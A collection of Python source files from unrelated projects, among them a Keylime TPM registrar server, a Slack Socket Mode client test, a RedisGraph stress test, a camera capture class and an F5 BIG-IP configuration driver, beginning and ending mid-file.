self.server.db.update_agent(agent_id, 'active',True)
else:
ex_mac = crypto.do_hmac(agent['key'],agent_id)
if ex_mac == auth_tag:
self.server.db.update_agent(agent_id, 'active',True)
else:
raise Exception("Auth tag %s does not match expected value %s"%(auth_tag,ex_mac))
common.echo_json_response(self, 200, "Success")
logger.info('PUT activated: ' + agent_id)
elif "vactivate" in rest_params:
deepquote = json_body.get('deepquote',None)
agent = self.server.db.get_agent(agent_id)
if agent is None:
raise Exception("attempting to activate agent before requesting registrar for %s"%agent_id)
if not agent['virtual']:
raise Exception("attempting to activate physical AIK using virtual interface for %s"%agent_id)
# get an physical AIK for this host
registrar_client.init_client_tls(config, 'registrar')
provider_keys = registrar_client.getKeys(config.get('registrar', 'provider_registrar_ip'), config.get('registrar', 'provider_registrar_tls_port'), agent_id)
# we already have the vaik
tpm = tpm_obj.getTPM(need_hw_tpm=False,tpm_version=agent['tpm_version'])
if not tpm.check_deep_quote(agent_id,
hashlib.sha1(agent['key']).hexdigest(),
agent_id+agent['aik']+agent['ek'],
deepquote,
agent['aik'],
provider_keys['aik']):
raise Exception("Deep quote invalid")
self.server.db.update_agent(agent_id, 'active',True)
self.server.db.update_agent(agent_id, 'provider_keys',provider_keys)
common.echo_json_response(self, 200, "Success")
logger.info('PUT activated: ' + agent_id)
else:
pass
except Exception as e:
common.echo_json_response(self, 400, "Error: %s"%e)
logger.warning("PUT for " + agent_id + " returning 400 response. Error: %s"%e)
logger.exception(e)
return
def do_DELETE(self):
"""DELETE not supported"""
common.echo_json_response(self, 405, "DELETE not supported")
return
def log_message(self, logformat, *args):
return
#consider using PooledProcessMixIn
# https://github.com/muayyad-alsadi/python-PooledProcessMixIn
class ProtectedRegistrarServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
db = None
def __init__(self, server_address, db,RequestHandlerClass):
"""Constructor overridden to provide ability to read file"""
self.db = db
http.server.HTTPServer.__init__(self, server_address, RequestHandlerClass)
def shutdown(self):
http.server.HTTPServer.shutdown(self)
class UnprotectedRegistrarServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
db = None
def __init__(self, server_address,db,RequestHandlerClass):
"""Constructor overridden to provide ability to read file"""
self.db = db
http.server.HTTPServer.__init__(self, server_address, RequestHandlerClass)
def shutdown(self):
http.server.HTTPServer.shutdown(self)
def init_db(dbname):
# in the form key, SQL type
cols_db = {
'agent_id': 'TEXT PRIMARY_KEY',
'key': 'TEXT',
'aik': 'TEXT',
'ek': 'TEXT',
'ekcert': 'TEXT',
'virtual': 'INT',
'active': 'INT',
'provider_keys': 'TEXT',
'regcount': 'INT',
}
# these are the columns that contain json data and need marshalling
json_cols_db = ['provider_keys']
# in the form key : default value
exclude_db = {}
return keylime_sqlite.KeylimeDB(dbname,cols_db,json_cols_db,exclude_db)
def do_shutdown(servers):
for server in servers:
server.shutdown()
def start(tlsport,port,dbfile):
"""Main method of the Registrar Server. This method is encapsulated in a function for packaging to allow it to be
called as a function by an external program."""
threads = []
servers = []
serveraddr = ('', tlsport)
db = init_db("%s/%s"%(common.WORK_DIR,dbfile))
count = db.count_agents()
if count>0:
logger.info("Loaded %d public keys from database"%count)
server = ProtectedRegistrarServer(serveraddr, db, ProtectedHandler)
context = cloud_verifier_common.init_mtls(section='registrar',
generatedir='reg_ca')
if context is not None:
server.socket = context.wrap_socket (server.socket, server_side=True)
thread = threading.Thread(target=server.serve_forever)
threads.append(thread)
# start up the unprotected registrar server
serveraddr2 = ('',port)
server2 = UnprotectedRegistrarServer(serveraddr2,db,UnprotectedHandler)
thread2 = threading.Thread(target=server2.serve_forever)
threads.append(thread2)
servers.append(server)
servers.append(server2)
logger.info('Starting Cloud Registrar Server on ports %s and %s (TLS) use <Ctrl-C> to stop'%(port,tlsport))
for thread in threads:
thread.start()
def signal_handler(signal, frame):
do_shutdown(servers)
sys.exit(0)
# Catch these signals. Note that a SIGKILL cannot be caught, so
# killing this process with "kill -9" may result in improper shutdown
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
# keep the main thread active, so it can process the signals and gracefully shutdown
while True:
if not any([thread.isAlive() for thread in threads]):
# All threads have stopped
break
else:
# Some threads are still going
time.sleep(1)
for thread in threads:
thread.join()
|
test_interactions_websocket_client.py
|
import logging
import time
import unittest
from random import randint
from threading import Thread
from websocket import WebSocketException
from slack_sdk.socket_mode.client import BaseSocketModeClient
from slack_sdk.socket_mode.request import SocketModeRequest
from slack_sdk import WebClient
from slack_sdk.socket_mode.websocket_client import SocketModeClient
from tests.helpers import is_ci_unstable_test_skip_enabled
from tests.slack_sdk.socket_mode.mock_socket_mode_server import (
start_socket_mode_server,
socket_mode_envelopes,
socket_mode_hello_message,
)
from tests.slack_sdk.socket_mode.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
class TestInteractionsWebSocketClient(unittest.TestCase):
logger = logging.getLogger(__name__)
def setUp(self):
setup_mock_web_api_server(self)
self.web_client = WebClient(
token="xoxb-api_test",
base_url="http://localhost:8888",
)
def tearDown(self):
cleanup_mock_web_api_server(self)
def test_interactions(self):
if is_ci_unstable_test_skip_enabled():
return
t = Thread(target=start_socket_mode_server(self, 3012))
t.daemon = True
t.start()
received_messages = []
received_socket_mode_requests = []
def message_handler(ws_app, message):
self.logger.info(f"Raw Message: {message}")
time.sleep(randint(50, 200) / 1000)
received_messages.append(message)
def socket_mode_request_handler(
client: BaseSocketModeClient, request: SocketModeRequest
):
self.logger.info(f"Socket Mode Request: {request}")
time.sleep(randint(50, 200) / 1000)
received_socket_mode_requests.append(request)
client = SocketModeClient(
app_token="xapp-A111-222-xyz",
web_client=self.web_client,
on_message_listeners=[message_handler],
auto_reconnect_enabled=False,
trace_enabled=True,
)
client.socket_mode_request_listeners.append(socket_mode_request_handler)
try:
time.sleep(1) # wait for the server
client.wss_uri = "ws://0.0.0.0:3012/link"
client.connect()
self.assertTrue(client.is_connected())
time.sleep(1) # wait for the message receiver
for _ in range(10):
client.send_message("foo")
client.send_message("bar")
client.send_message("baz")
self.assertTrue(client.is_connected())
expected = (
socket_mode_envelopes
+ [socket_mode_hello_message]
+ ["foo", "bar", "baz"] * 10
)
expected.sort()
count = 0
while count < 10 and len(received_messages) < len(expected):
time.sleep(0.2)
count += 0.2
received_messages.sort()
self.assertEqual(received_messages, expected)
self.assertEqual(
len(socket_mode_envelopes), len(received_socket_mode_requests)
)
finally:
client.close()
self.server.stop()
self.server.close()
def test_send_message_while_disconnection(self):
if is_ci_unstable_test_skip_enabled():
return
t = Thread(target=start_socket_mode_server(self, 3012))
t.daemon = True
t.start()
time.sleep(2) # wait for the server
try:
self.reset_sever_state()
client = SocketModeClient(
app_token="xapp-A111-222-xyz",
web_client=self.web_client,
auto_reconnect_enabled=False,
trace_enabled=True,
)
client.wss_uri = "ws://0.0.0.0:3012/link"
client.connect()
time.sleep(1) # wait for the connection
client.send_message("foo")
client.disconnect()
time.sleep(1) # wait for the connection
try:
client.send_message("foo")
# TODO: The client may not raise an exception here
# self.fail("WebSocketException is expected here")
except WebSocketException as _:
pass
client.connect()
time.sleep(1) # wait for the connection
client.send_message("foo")
finally:
client.close()
self.server.stop()
self.server.close()
|
test_stress.py
|
import os
import sys
import threading
from RLTest import Env
from redisgraph import Graph
from base import FlowTestsBase
GRAPH_ID = "G" # Graph identifier.
CLIENT_COUNT = 100 # Number of concurrent connections.
graphs = None # One graph object per client.
def query_crud(graph, threadID):
for i in range(10):
create_query = "CREATE (n:node {v:'%s'}), (n)-[:have]->({value:'%s'}), (n)-[:have]->({value:'%s'})" % (threadID, threadID, threadID)
read_query = "MATCH (n0:node {v:'%s'})<-[:have]-(n:node)-[:have]->(n1:node) return n1.v" % threadID
update_query = "MATCH (n:node {v: '%s'}) SET n.x = '%s'" % (threadID, threadID)
delete_query = "MATCH (n:node {v: '%s'})-[:have*]->(n1:node) DELETE n, n1" % threadID
graph.query(create_query)
graph.query(read_query)
graph.query(update_query)
graph.query(delete_query)
class testStressFlow(FlowTestsBase):
def __init__(self):
self.env = Env()
global graphs
graphs = []
for i in range(0, CLIENT_COUNT):
redis_con = self.env.getConnection()
graphs.append(Graph(GRAPH_ID, redis_con))
# Count number of nodes in the graph
def test00_stress(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_crud, args=(graph, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
# Make sure we did not crashed.
redis_con = graphs[0].redis_con
redis_con.ping()
|
k8.py
|
import logging
import requests
import json
import platform
import time
import threading
import traceback
from .helpers import *
from .args import get_args
def i_am_supervisor(args):
try:
res = requests.get("http://localhost:4040")
except requests.exceptions.ConnectionError:
logger.warning("Could not contact leadership election sidecar, assuming not leader")
return False
if(res.ok):
data = json.loads(res.content)
leader_name = data["name"]
my_name = platform.node()
return leader_name == my_name
else:
res.raise_for_status()
def i_am_drone(args):
am_sup = i_am_supervisor(args)
am_drone = not am_sup or args.master_works
return am_drone
# --------------------------------------------------------------------------
# Thread work loops
# --------------------------------------------------------------------------
def do_drone(args):
drone = None
try:
while True:
am_drone = i_am_drone(args)
if am_drone and drone is None:
logger.info("Start drone")
drone = get_drone(args)
elif not am_drone and drone is not None:
logger.info("Stop drone")
drone.close()
drone = None
if drone is not None:
drone.run_epoch()
time.sleep(args.sleep_per_cycle)
# TODO: actual signalling
except KeyboardInterrupt:
if drone is not None:
drone.close()
except Exception as e:
traceback.print_exc()
raise e
def do_supervisor(args):
sup = None
try:
while True:
am_sup = i_am_supervisor(args)
if am_sup and sup is None:
logger.info("Start supervisor")
sup = get_supervisor(args)
elif not am_sup and sup is not None:
logger.info("Stop supervisor")
sup.close()
sup = None
if sup is not None:
sup.run_epoch()
time.sleep(args.sleep_per_cycle)
# TODO: actual signalling
except KeyboardInterrupt:
if sup is not None:
sup.close()
except Exception as e:
traceback.print_exc()
raise e
# --------------------------------------------------------------------------
# Dispatch threads from main loop
# --------------------------------------------------------------------------
def run_main_dispatch(args):
my_sup = None
my_drones = { k:None for k in range(args.n_drones) }
try:
while True:
if my_sup is None or not my_sup.isAlive():
logger.debug("Dispatch supervisor thread")
my_sup = threading.Thread(target=do_supervisor, args=(args,))
my_sup.setDaemon(True)
my_sup.start()
for key, drone in my_drones.items():
if drone is None or not drone.isAlive():
logger.debug("Dispatch drone thread")
t = threading.Thread(target=do_drone, args=(args,))
t.setDaemon(True)
t.start()
my_drones[key] = t
time.sleep(args.sleep_per_cycle)
except KeyboardInterrupt:
# do something to signal to threads
pass
if __name__ == "__main__":
args = get_args()
install_logging(args)
run_main_dispatch(args)
|
client.py
|
import socket
import ssl
import time
import threading
import json
from src.server.server_utilities import prepare_message
from src.server.server_strings import *
from src.server import server_data
SERVER_IP = "127.0.0.1"
SERVER_PORT = 9999
PLAYER_NAME = input("Enter a display name: ")
while len(PLAYER_NAME) == 0:
PLAYER_NAME = input("Enter a display name: ")
SERVER_NAME = 'N/A'
HEADER_SIZE = 8
CLIENT_TICK_RATE = 0.1
print("Client Initializing...")
context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
print(f"Connecting to server: [{SERVER_IP}:{SERVER_PORT}]")
insecure_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_socket = context.wrap_socket(insecure_socket, server_hostname=SERVER_IP)
ssl_socket.connect((SERVER_IP, SERVER_PORT))
print(f"Server Certificate:\n{ssl.DER_cert_to_PEM_cert(ssl_socket.getpeercert(True))}")
print(f"Connnection Established: [{SERVER_IP}:{SERVER_PORT}]")
print("------------------------------------------------------------------")
print("This client currently implements a command-system for testing purposes")
print("This will be overridden when the C# client is made.")
print("------------------------------------------------------------------")
print("You can type commands into the console to send them to the server.")
print("\nAvailable commands: ")
print("!say <message>: Broadcasts a chat message to all clients on the server.")
print("!draw: Draws a card from the deck to the player hand.")
print("!play <card_index>: Plays a card from the player hand by the given index.")
print("!cards: Lists the cards currently on hand.")
print("!clients: Lists all the clients on the server.")
print("!start: Starts a game session, currently it only creates a deck and distributes 7 cards to each client.")
print("!stop: Stops an active game session and clears the hands of all clients.")
print("------------------------------------------------------------------")
def disconnect_from_server(reason=None):
global kill_threads
kill_threads = True
if ssl_socket:
ssl_socket.close()
print(f"Client disconnected from server: [{SERVER_IP}:{SERVER_PORT}]")
if reason:
print(f'Client disconnected due to the following: {reason}')
def inbound_server_data():
# Loop incoming messages
while not kill_threads:
try:
# Get header from 10 bytes (2 are formatting)
raw_header = ssl_socket.recv(HEADER_SIZE + 2)
except socket.error as e:
# print(e)
disconnect_from_server()
continue
if len(raw_header) <= 0:
continue
# Get message length from given header info
msg_len = int(raw_header[1:HEADER_SIZE + 1].decode("utf-8"))
# Get the message based on the number of bytes stated in the header
raw_msg = ssl_socket.recv(msg_len)
header = raw_header.decode('utf-8')
message = json.loads(raw_msg.decode('utf-8'))
if message[SERV_DATA_CONTENT] == "!quit":
disconnect_from_server()
elif message[SERV_DATA_CONTENT].split(' ', 1)[0] == "!setname":
global PLAYER_NAME
PLAYER_NAME = message[SERV_DATA_CONTENT].split(' ', 1)[1]
print(f'[DEBUG] Player name set: {PLAYER_NAME}')
elif message[SERV_DATA_CONTENT].split(' ', 1)[0] == "!setserver":
global SERVER_NAME
SERVER_NAME = message[SERV_DATA_CLIENT]
print(f'[DEBUG] Server name set: {SERVER_NAME}')
else:
print(f"{header}[{message[SERV_DATA_CLIENT] if message[SERV_DATA_CLIENT] is not None else SERVER_NAME}{' -> Me' if message[SERV_DATA_TYPE] != SERV_BROADCAST else ''}]:{message[SERV_DATA_CONTENT]}")
def outbound_data_to_server():
# Send connect message
connect_data = server_data.Data(content_type=SERV_MESSAGE, content_data=f"!connect {PLAYER_NAME}", client=PLAYER_NAME)
ssl_socket.send(bytes(prepare_message(connect_data), 'utf-8'))
while not kill_threads:
try:
# Send data to the server.
data_to_send = input()
if len(data_to_send) != 0:
data_to_send = server_data.Data(content_type=SERV_MESSAGE, content_data=data_to_send, client=PLAYER_NAME)
ssl_socket.send(bytes(prepare_message(data_to_send), 'utf-8'))
except socket.error as e:
# print(e)
disconnect_from_server()
return
time.sleep(CLIENT_TICK_RATE)
# Kill flags
kill_threads = False
# Start inbound data retrieval.
inbound_thread = threading.Thread(target=inbound_server_data)
inbound_thread.start()
# Start outbound data sending.
outbound_thread = threading.Thread(target=outbound_data_to_server)
outbound_thread.start()
|
camera.py
|
import traitlets
from traitlets.config.configurable import SingletonConfigurable
import atexit
import cv2
from cv2 import VideoCapture, CAP_GSTREAMER
import threading
import numpy as np
from sloth.undistort import FisheyeUndistorter, PerspectiveUndistorter, get_fisheye
class Camera(SingletonConfigurable):
value = traitlets.Any()
# config
width = traitlets.Integer(default_value=224).tag(config=True)
height = traitlets.Integer(default_value=224).tag(config=True)
fps = traitlets.Integer(default_value=21).tag(config=True)
capture_width = traitlets.Integer(default_value=3280).tag(config=True)
capture_height = traitlets.Integer(default_value=2464).tag(config=True)
argusmode = traitlets.Integer(default_value=-1).tag(config=True)
flipmode = traitlets.Integer(default_value=0).tag(config=True)
autostart = traitlets.Bool(default_value=True).tag(config=True)
extraconfig = traitlets.Unicode(default_value="").tag(config=True)
def __init__(self, *args, **kwargs):
self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)
super(Camera, self).__init__(*args, **kwargs)
self.undistort = False
self.undistorter = None
self.undistort_dim = None
self.undistort_k = None
self.undistort_d = None
self.undistort_balance = 0
self.undistort_dim2 = None
self.undistort_dim3 = None
self.undistort_map1 = None
self.undistort_map2 = None
self.crop_x1 = None
self.crop_y1 = None
self.crop_x2 = None
self.crop_y2 = None
self.warp = False
if self.argusmode >= 0:
vw, vh, vf = self._get_argus_mode(self.argusmode)
self.capture_width = vw
self.capture_height = vh
self.fps = vf
if self.width == 0 or self.height == 0:
self.width = self.capture_width
self.height = self.capture_height
try:
self.cap = VideoCapture(self._gst_str(), CAP_GSTREAMER)
re, image = self.cap.read()
if not re:
raise RuntimeError('Could not read image from camera.')
self.value = image
if self.autostart:
self.start()
except:
self.stop()
raise RuntimeError('Could not initialize camera. Please see error trace.')
atexit.register(self.stop)
def _capture_frames(self):
while True:
re, image = self.cap.read()
if re:
self.value = self.post_process_image(image)
else:
break
def _gst_str(self):
return 'nvarguscamerasrc %s ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=%d ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (
self.extraconfig, self.capture_width, self.capture_height, self.fps, self.flipmode, self.width, self.height)
def _get_argus_mode(self, mode):
if mode == 0:
return 3280, 2464, 21
elif mode == 1:
return 3280, 1848, 28
elif mode == 2:
return 1920, 1080, 30
elif mode == 3:
return 1280, 720, 60
elif mode == 4:
return 1280, 720, 120
def start(self):
if not self.cap.isOpened():
self.cap.open(self._gst_str(), CAP_GSTREAMER)
if not hasattr(self, 'thread') or not self.thread.isAlive():
self.thread = threading.Thread(target=self._capture_frames)
self.thread.start()
def stop(self):
if hasattr(self, 'cap'):
self.cap.release()
if hasattr(self, 'thread'):
self.thread.join()
def restart(self):
self.stop()
self.start()
def enable_undistort(self, balance=0.0, dim2=None, dim3=None):
self.undistort_balance = balance
self.undistort_dim2 = dim2
self.undistort_dim3 = dim3
# allow the caller to load up the required parameters manually
if self.undistort_dim != None and self.undistort_k != None and self.undistort_d != None:
self.undistort = True
else:
fK, fD = get_fisheye(self.width, self.height)
if fK is not None and fD is not None:
self.undistort_dim = (self.width, self.height)
self.undistort_k = fK
self.undistort_d = fD
self.undistort = True
else:
self.undistort = False
if self.undistort:
self.undistorter = FisheyeUndistorter(self.undistort_dim, self.undistort_k, self.undistort_d, bal=self.undistort_balance, dim2=self.undistort_dim2, dim3=self.undistort_dim3)
self.warper = None # reset the warper
def disable_undistort(self):
self.undistort = False
self.warper = None # reset the warper
def enable_warp(self, horizon=0.0, angle=45, vstretch=1.8):
self.warp = True
self.warp_horizon = horizon
self.warp_angle = angle
self.warp_vstretch = vstretch
self.warper = None
def disable_warp(self):
self.warp = False
self.warper = None
def enable_crop(self, x1, y1, x2=None, y2=None, width=None, height=None):
self.crop_x1 = x1
self.crop_y1 = y1
if (x2 != None and width != None) or (x2 == None and width == None) or (y2 != None and height != None) or (y2 == None and height == None):
self.crop_x1 = None
self.crop_y1 = None
raise ValueError("Too many or not enough arguments for cropping")
else:
if x2 != None:
self.crop_x2 = x2
else:
self.crop_x2 = x1 + width
if y2 != None:
self.crop_y2 = y2
else:
self.crop_y2 = y1 + height
def disable_crop(self):
self.crop_x1 = None
self.crop_y1 = None
self.crop_x2 = None
self.crop_y2 = None
def post_process_image(self, img):
if self.undistort and self.undistorter != None:
img = self.undistorter.undistort_image(img)
if self.warp:
if self.warper == None:
self.warper = PerspectiveUndistorter(img.shape[1], img.shape[0], horizon = self.warp_horizon, angle = self.warp_angle, vstretch = self.warp_vstretch)
img = self.warper.undistort_image(img)
if self.crop_x1 != None and self.crop_y1 != None and self.crop_x2 != None and self.crop_y2 != None:
img = img[self.crop_y1:self.crop_y2, self.crop_x1:self.crop_x2]
return img
|
bigipconfigdriver.py
|
#!/usr/bin/env python
# Copyright (c) 2016-2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
import fcntl
import hashlib
import json
import logging
import os
import os.path
import signal
import sys
import threading
import time
import traceback
import pyinotify
from urlparse import urlparse
from f5_cccl.api import F5CloudServiceManager
from f5_cccl.exceptions import F5CcclError
from f5_cccl.utils.mgmt import mgmt_root
from f5_cccl.utils.profile import (delete_unused_ssl_profiles,
create_client_ssl_profile,
create_server_ssl_profile)
log = logging.getLogger(__name__)
console = logging.StreamHandler()
console.setFormatter(
logging.Formatter("[%(asctime)s %(name)s %(levelname)s] %(message)s"))
root_logger = logging.getLogger()
root_logger.addHandler(console)
class ResponseStatusFilter(logging.Filter):
def filter(self, record):
return not record.getMessage().startswith("RESPONSE::STATUS")
class CertFilter(logging.Filter):
def filter(self, record):
return "CERTIFICATE" not in record.getMessage()
class KeyFilter(logging.Filter):
def filter(self, record):
return "PRIVATE KEY" not in record.getMessage()
root_logger.addFilter(ResponseStatusFilter())
root_logger.addFilter(CertFilter())
root_logger.addFilter(KeyFilter())
DEFAULT_LOG_LEVEL = logging.INFO
DEFAULT_VERIFY_INTERVAL = 30.0
NET_SCHEMA_NAME = 'cccl-net-api-schema.yml'
class CloudServiceManager():
"""CloudServiceManager class.
Applies a configuration to a BigIP
Args:
bigip: ManagementRoot object
partition: BIG-IP partition to manage
"""
def __init__(self, bigip, partition, user_agent=None, prefix=None,
schema_path=None):
"""Initialize the CloudServiceManager object."""
self._mgmt_root = bigip
self._schema = schema_path
self._cccl = F5CloudServiceManager(
bigip,
partition,
user_agent=user_agent,
prefix=prefix,
schema_path=schema_path)
def mgmt_root(self):
""" Return the BIG-IP ManagementRoot object"""
return self._mgmt_root
def get_partition(self):
""" Return the managed partition."""
return self._cccl.get_partition()
def get_schema_type(self):
"""Return 'ltm' or 'net', based on schema type."""
if self._schema is None:
return 'ltm'
elif 'net' in self._schema:
return 'net'
def _apply_ltm_config(self, config):
"""Apply the ltm configuration to the BIG-IP.
Args:
config: BIG-IP config dict
"""
return self._cccl.apply_ltm_config(config)
def _apply_net_config(self, config):
"""Apply the net configuration to the BIG-IP."""
return self._cccl.apply_net_config(config)
def get_proxy(self):
"""Called from 'CCCL' delete_unused_ssl_profiles"""
return self._cccl.get_proxy()
class IntervalTimerError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class IntervalTimer(object):
def __init__(self, interval, cb):
float(interval)
if 0 >= interval:
raise IntervalTimerError("interval must be greater than 0")
if not cb or not callable(cb):
raise IntervalTimerError("cb must be callable object")
self._cb = cb
self._interval = interval
self._execution_time = 0.0
self._running = False
self._timer = None
self._lock = threading.RLock()
def _set_execution_time(self, start_time, stop_time):
if stop_time >= start_time:
self._execution_time = stop_time - start_time
else:
self._execution_time = 0.0
def _adjust_interval(self):
adjusted_interval = self._interval - self._execution_time
if adjusted_interval < 0.0:
adjusted_interval = 0.0
self._execution_time = 0.0
return adjusted_interval
def _run(self):
start_time = time.clock()
try:
self._cb()
except Exception:
log.exception('Unexpected error')
finally:
with self._lock:
stop_time = time.clock()
self._set_execution_time(start_time, stop_time)
if self._running:
self.start()
def is_running(self):
return self._running
def start(self):
with self._lock:
if self._running:
# restart timer, possibly with a new interval
self.stop()
self._timer = threading.Timer(self._adjust_interval(), self._run)
# timers can't be stopped, cancel just prevents the callback from
# occuring when the timer finally expires. Make it a daemon allows
# cancelled timers to exit eventually without a need for join.
self._timer.daemon = True
self._timer.start()
self._running = True
def stop(self):
with self._lock:
if self._running:
self._timer.cancel()
self._timer = None
self._running = False
class ConfigError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def create_ltm_config(partition, config):
"""Extract a BIG-IP configuration from the LTM configuration.
Args:
config: BigIP config
"""
ltm = {}
if 'resources' in config and partition in config['resources']:
ltm = config['resources'][partition]
return ltm
def create_network_config(config):
"""Extract a BIG-IP Network configuration from the network config.
Args:
config: BigIP config which contains vxlan defs
"""
net = {}
if 'vxlan-fdb' in config:
net['userFdbTunnels'] = [config['vxlan-fdb']]
if ('vxlan-arp' in config and 'arps' in config['vxlan-arp']
and config['vxlan-arp']['arps'] is not None):
net['arps'] = config['vxlan-arp']['arps']
log.debug("NET Config: %s", json.dumps(net))
return net
def _create_custom_profiles(mgmt, partition, custom_profiles):
incomplete = 0
# Server profiles may reference a CA cert in another server profile.
# These need to be loaded first.
for profile in custom_profiles:
caFile = profile.get('caFile', '')
if profile['context'] == 'serverside' and caFile == "self":
incomplete += create_server_ssl_profile(mgmt, partition, profile)
for profile in custom_profiles:
if profile['context'] == 'clientside':
incomplete += create_client_ssl_profile(mgmt, partition, profile)
elif profile['context'] == 'serverside':
caFile = profile.get('caFile', '')
if caFile != "self":
incomplete += create_server_ssl_profile(
mgmt, partition, profile)
else:
log.error(
"Only client or server custom profiles are supported.")
return incomplete
def _delete_unused_ssl_profiles(mgr, partition, config):
return delete_unused_ssl_profiles(mgr, partition, config)
class ConfigHandler():
def __init__(self, config_file, managers, verify_interval):
self._config_file = config_file
self._managers = managers
self._condition = threading.Condition()
self._thread = threading.Thread(target=self._do_reset)
self._pending_reset = False
self._stop = False
self._backoff_time = 1
self._backoff_timer = None
self._max_backoff_time = 128
self._verify_interval = verify_interval
self._interval = IntervalTimer(self._verify_interval,
self.notify_reset)
self._thread.start()
def stop(self):
self._condition.acquire()
self._stop = True
self._condition.notify()
self._condition.release()
if self._backoff_timer is not None:
self.cleanup_backoff()
def notify_reset(self):
self._condition.acquire()
self._pending_reset = True
self._condition.notify()
self._condition.release()
def _do_reset(self):
log.debug('config handler thread start')
with self._condition:
while True:
self._condition.acquire()
if not self._pending_reset and not self._stop:
self._condition.wait()
log.debug('config handler woken for reset')
self._pending_reset = False
self._condition.release()
if self._stop:
log.info('stopping config handler')
if self._backoff_timer is not None:
self.cleanup_backoff()
break
start_time = time.time()
incomplete = 0
try:
config = _parse_config(self._config_file)
# No 'resources' indicates that the controller is not
# yet ready -- it does not mean to apply an empty config
if 'resources' not in config:
continue
incomplete = self._update_cccl(config)
except ValueError:
formatted_lines = traceback.format_exc().splitlines()
last_line = formatted_lines[-1]
log.error('Failed to process the config file {} ({})'
.format(self._config_file, last_line))
incomplete = 1
except Exception:
log.exception('Unexpected error')
incomplete = 1
if incomplete:
# Error occurred, perform retries
self.handle_backoff()
else:
if (self._interval and self._interval.is_running()
is False):
self._interval.start()
self._backoff_time = 1
if self._backoff_timer is not None:
self.cleanup_backoff()
perf_enable = os.environ.get('SCALE_PERF_ENABLE')
if perf_enable: # pragma: no cover
test_data = {}
app_count = 0
backend_count = 0
for service in config['resources']['test'][
'virtualServers']:
app_count += 1
backends = 0
for pool in config['resources']['test']['pools']:
if service['name'] in pool['name']:
backends = len(pool['members'])
break
test_data[service['name']] = backends
backend_count += backends
test_data['Total_Services'] = app_count
test_data['Total_Backends'] = backend_count
test_data['Time'] = time.time()
json_data = json.dumps(test_data)
log.info('SCALE_PERF: Test data: %s',
json_data)
log.debug('updating tasks finished, took %s seconds',
time.time() - start_time)
if self._interval:
self._interval.stop()
def _update_cccl(self, config):
_handle_vxlan_config(config)
cfg_net = create_network_config(config)
incomplete = 0
for mgr in self._managers:
partition = mgr.get_partition()
cfg_ltm = create_ltm_config(partition, config)
try:
# Manually create custom profiles;
# CCCL doesn't yet do this
if 'customProfiles' in cfg_ltm and \
mgr.get_schema_type() == 'ltm':
tmp = 0
tmp = _create_custom_profiles(
mgr.mgmt_root(),
partition,
cfg_ltm['customProfiles'])
incomplete += tmp
# Apply the BIG-IP config after creating profiles
# and before deleting profiles
if mgr.get_schema_type() == 'net':
incomplete += mgr._apply_net_config(cfg_net)
else:
incomplete += mgr._apply_ltm_config(cfg_ltm)
# Manually delete custom profiles (if needed)
if mgr.get_schema_type() == 'ltm':
_delete_unused_ssl_profiles(
mgr,
partition,
cfg_ltm)
except F5CcclError as e:
# We created an invalid configuration, raise the
# exception and fail
log.error("CCCL Error: %s", e.msg)
incomplete += 1
return incomplete
def cleanup_backoff(self):
"""Cleans up canceled backoff timers."""
self._backoff_timer.cancel()
self._backoff_timer.join()
self._backoff_timer = None
def handle_backoff(self):
"""Wrapper for calls to retry_backoff."""
if (self._interval and self._interval.is_running() is
True):
self._interval.stop()
if self._backoff_timer is None:
self.retry_backoff()
def retry_backoff(self):
"""Add a backoff timer to retry in case of failure."""
def timer_cb():
self._backoff_timer = None
self.notify_reset()
self._backoff_timer = threading.Timer(
self._backoff_time, timer_cb
)
log.error("Error applying config, will try again in %s seconds",
self._backoff_time)
self._backoff_timer.start()
if self._backoff_time < self._max_backoff_time:
self._backoff_time *= 2
class ConfigWatcher(pyinotify.ProcessEvent):
def __init__(self, config_file, on_change):
basename = os.path.basename(config_file)
if not basename or 0 == len(basename):
raise ConfigError('config_file must be a file path')
self._config_file = config_file
self._on_change = on_change
self._config_dir = os.path.dirname(self._config_file)
self._config_stats = None
if os.path.exists(self._config_file):
try:
self._config_stats = self._digest()
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
self._running = False
self._polling = False
self._user_abort = False
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
self._user_abort = True
self._running = False
def _loop_check(self, notifier):
if self._polling:
log.debug('inotify loop ended - returning to polling mode')
return True
else:
return False
def loop(self):
self._running = True
if not os.path.exists(self._config_dir):
log.info(
'configured directory doesn\'t exist {}, entering poll loop'.
format(self._config_dir))
self._polling = True
while self._running:
try:
while self._polling:
if self._polling:
if os.path.exists(self._config_dir):
log.debug('found watchable directory - {}'.format(
self._config_dir))
self._polling = False
break
else:
log.debug('waiting for watchable directory - {}'.
format(self._config_dir))
time.sleep(1)
_wm = pyinotify.WatchManager()
_notifier = pyinotify.Notifier(_wm, default_proc_fun=self)
_notifier.coalesce_events(True)
mask = (pyinotify.IN_CREATE | pyinotify.IN_DELETE |
pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO |
